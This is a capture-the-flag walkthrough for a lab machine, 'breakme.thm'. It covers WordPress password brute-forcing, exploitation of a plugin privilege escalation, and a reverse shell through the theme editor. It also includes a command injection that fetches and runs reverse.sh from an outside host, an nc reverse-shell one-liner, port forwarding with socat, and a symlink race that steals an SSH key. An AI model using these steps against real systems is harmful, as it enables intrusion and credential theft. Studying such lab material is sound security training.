Make sure to add the machine to your /etc/hosts file
sudo echo '10.10.219.246 breakme.thm' >> /etc/hostsPort Scanning:
rustscan -a breakme.thm
Visiting The Web Page on Port 80:
Directory Fuzzing:
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://breakme.thm/FUZZ
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://breakme.thm/wordpress/FUZZ
More Digging:
Found a Login page at http://breakme.thm/wordpress/wp-login.php and found a valid user “admin”
Now, scanning with wpscan:
wpscan --url http://breakme.thm/wordpress/wp-login.php -U admin -P ~/Desktop/WordLists/Passwords/rockyou.txtNo password was found.
Next, I tried enumerating users,plugins,templates with wpscan
wpscan --url http://breakme.thm/wordpress/ -e u,p,tIt found 2 users and 1 plugin:
Let’s try to crack bob’s password using wpscan
wpscan --url http://breakme.thm/wordpress/ -U bob -P ~/Desktop/WordLists/Passwords/rockyou.txtCHECKMATE!
Let’s login using these credentials.
After looking around, I did not find anything. I searched if the plugin is vulnerable and guess what. It is!
https://www.wordfence.com/blog/2023/04/privilege-escalation-vulnerability-patched-promptly-in-wp-data-access-wordpress-plugin/
We can gain Admin privileges by simply modifying the update profile request and add the following param at the end.
wpda_role[]=administrator
And now we are Admins!
Time to get a reverse shell!
Going and editing the 404.php file content. I received a reverse shell.
http://breakme.thm/wordpress/wp-admin/theme-editor.php?file=404.php&theme=twentytwentyone
After updating the file, visit the following URL and make sure you have an open listener:
http://breakme.thm/wordpress/wp-content/themes/twentytwentyone/404.php
Now. Time To Cook!!
Make the terminal stable with:
python3 -c "import pty;pty.spawn('/bin/bash')"
export TERM=xtermGoing into “/var/www/html/wordpress” and reading the content of wp-config.php file. we found database credentials
Port Forwarding
We found a service running on port 9999
We’ll use chisel
On target machine:
socat TCP-LISTEN:5555,fork TCP:127.0.0.1:9999On our machine:
socat TCP-LISTEN:9999,fork TCP:10.10.72.131:5555Then visit http://127.0.0.1:9999/
Testing The Website:
After testing the website, and lurking around. I entered the following characters to test for filtering
!@#$%^&*()_+-={}[]|:;’”<>,.?/
Result:
We can use the “ | ”character to inject commands.
Let’s try to get a reverse shell.
Create a bash file having the following code
#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.6.62.127 4444 >/tmp/fStart a python server on port 8000
python3 -m http.server 8000Then go into the website and enter the following command in the user field and make sure you have an open listener:
|curl${IFS}http://10.9.3.146:8000/reverse.sh|bashEt Voilà!
We got our first
First thing we did is grabbing linpeas and running it on the box and we found a readfile binary on Youcef home directory that has an SUID on. Getting the binary into our machine and giving it to Ghidra and Chat-GPT we managed to get a look-a-like source code of the binary.
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
#include <assert.h>
#define TARGET_UID 0x3ea // Target UID: 1002 in decimal
// Main function that takes command-line arguments
int main(int argc, char *argv[]) {
int access_check;
__uid_t user_id;
ssize_t bytes_read;
struct stat file_stat;
char buffer[1024];
int file_descriptor;
int read_bytes;
int write_bytes;
uint is_symlink;
char *flag_check;
char *id_rsa_check;
// Check if exactly one argument is provided (argc should be 2)
if (argc == 2) {
// Check if the file provided exists and is accessible
access_check = access(argv[1], F_OK);
if (access_check == 0) {
// Get the real user ID of the calling process
user_id = getuid();
// Check if the user is the target UID (1002)
if (user_id == TARGET_UID) {
// Check if the file contains "flag" or "id_rsa" in its name
flag_check = strstr(argv[1], "flag");
id_rsa_check = strstr(argv[1], "id_rsa");
// Get file status information
lstat(argv[1], &file_stat);
// Check if the file is a symbolic link
is_symlink = (file_stat.st_mode & S_IFMT) == S_IFLNK;
// Check if the file is readable
access_check = access(argv[1], R_OK);
// If the file does not contain "flag", is not a symlink, is readable, and does not contain "id_rsa"
if (flag_check == NULL && is_symlink == 0 && access_check != -1 && id_rsa_check == NULL) {
// Print success message
puts("I guess you won!\n");
// Open the file for reading
file_descriptor = open(argv[1], O_RDONLY);
if (file_descriptor < 0) {
// Assertion failure if the file could not be opened
assert(file_descriptor >= 0 && "Failed to open the file");
}
// Read and output the file content to stdout
do {
bytes_read = read(file_descriptor, buffer, sizeof(buffer));
read_bytes = (int)bytes_read;
if (read_bytes < 1) break;
write_bytes = write(STDOUT_FILENO, buffer, (long)read_bytes);
} while (write_bytes > 0);
return 0;
} else {
// Print failure message if the file is restricted
puts("Nice try!");
return 1;
}
} else {
// If the user is not the target UID, print an error message
puts("You can't run this program");
return 1;
}
} else {
// If the file does not exist, print an error message
puts("File Not Found");
return 1;
}
} else {
// If the program is not called with exactly one argument, print usage instructions
puts("Usage: ./readfile <FILE>");
return 1;
}
}Time to get SSH
we need to run 2 commands:
while true; do ln -sf /home/youcef/.ssh/id_rsa symlink; rm symlink; touch symlink; done &for i in {1..30}; do /home/youcef/readfile symlink; doneAfter a bit we’ll get the key
Saving it on our machine, and cracking it’s password using john. We get an SSH session as youcef
And got our second flag!
Time To Get Root!
Checking priveleges of Youcef
Upon running the python script using sudo we’ll find ourselves in a python environement that has restrictions as we can’t execute some commands. After trying many payloads and checking many articles on python jails and manipulating payloads we found one that works and gives us a shell into root account.
And now go and get the root flag!
Happy Hacking!
